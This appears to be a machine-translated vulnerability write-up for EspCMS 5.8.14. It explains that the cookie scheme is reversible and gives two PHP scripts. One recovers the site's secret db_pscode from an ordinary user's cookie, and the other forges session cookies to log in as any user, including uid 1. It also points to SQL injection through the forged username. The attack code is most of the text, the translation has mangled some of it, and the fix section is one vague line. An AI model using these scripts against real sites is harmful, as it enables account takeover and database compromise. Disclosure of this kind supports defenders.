The latest EspCMS version can forge arbitrary Account Login (simple use of code)

The latest EspCMS version can forge arbitrary Account Login (source code analysis)
Espcms_utf8_5.8.14.03.03_ B

Db_pscode is an important part of the user cookie Generation Algorithm in EspCMS.

It seems that some of the former Daniel has submitted it many times, and the manufacturer only made slight changes, but the problem was not finally solved.

Here, you can register a Common Account and obtain db_pscode through account + cookie cracking.

First, the cookie encryption algorithm,/public/class_function.php, lines 144-170

 

function eccode($string, $operation = 'DECODE', $key = '@LFK24s224%@safS3s%1f%', $mcrype = true) {$result = null;if ($operation == 'ENCODE') {for ($i = 0; $i < strlen($string); $i++) {$char = substr($string, $i, 1);$keychar = substr($key, ($i % strlen($key)) - 1, 1);$char = chr(ord($char) + ord($keychar));$result.=$char;}$result = base64_encode($result);$result = str_replace(array('+', '/', '='), array('-', '_', ''), $result);} elseif ($operation == 'DECODE') {$data = str_replace(array('-', '_'), array('+', '/'), $string);$mod4 = strlen($data) % 4;if ($mod4) {$data .= substr('====', $mod4);}$string = base64_decode($data);for ($i = 0; $i < strlen($string); $i++) {$char = substr($string, $i, 1);$keychar = substr($key, ($i % strlen($key)) - 1, 1);$char = chr(ord($char) - ord($keychar));$result.=$char;}}return $result;}

I do not know whether the analysis is correct. The primary reason is that no irreversible function is used, which can lead to reverse streaming of db_pscode.

The db_pscode I set up locally is 81cc52c15f9f1df62679efdb12de1be. This is an example.

First, register an account and obtain the cookie as follows:

I wrote a simple example of db_pscode ~

 

<?php                 $string = "lmlilJRmY5RiZpdql2KV";                $username = "111111111111111";                $result = "";                $mod4 = strlen($string) % 4;                if ($mod4) {                        $string .= substr('====', $mod4);                }                $de_string = base64_decode($string);                for($i=0;$i<strlen($username);$i++){                        $char = chr(ord($de_string[$i+1]) - ord($username[$i]));                        $result .= $char;                }                echo "code=".$result;?>

Use this code to obtain db_pscode

 

Db_pscode is incomplete because the length of the user name we registered is not long enough. As long as the user name is registered, a long enough cookie can be obtained and the complete db_pscode can be obtained.

After obtaining db_pscode, you only need to forge two cookies. One is ecisp_member_username, and the other is ecisp_member_info. you can log on to any account.

I also simply wrote the code for calculating cookies.

 

<? Php $ string = "81cc52c15f9f1d"; // If the cookie is used to calculate the user name, enter the user name directly. // If the cookie is used to calculate the info, the format is 2 | 0 | 1 |. the first digit is uid $ username = "2 | 0 | 1 | "; $ result = ""; for ($ I = 0; $ I <strlen ($ username); $ I ++) {$ keychar = substr ($ string, ($ I % strlen ($ string)-1, 1); $ char = chr (ord ($ keychar) + ord ($ username [$ I]); $ result. = $ char;} $ result = base64_encode ($ result); $ result = str_replace (array ('+', '/', '='), array ('- ',' _ ', ''), $ Result); echo $ result;?>

Note: The username constructed here does not need to match the uid, because the program only queries whether the uid exists when reading the cookie, so the username can be constructed at will, and only the uid exists.

For example, if I want to log on to the account userid = 1, The ecisp_member_info in the cookie is calculated as the lrStk99mrt-tsQ

Another value can be calculated randomly. If it does not exist, OK.

Modify cookie

Direct access to/index. php? Ac = membermain & at = center, login successful

In addition, because username can be constructed at will, the injection is constructed at username...

It is found that there are multiple places that can be injected in this way, absolutely ignore gpc, ignore global filtering

Solution:

The algorithm problem is a fundamental problem.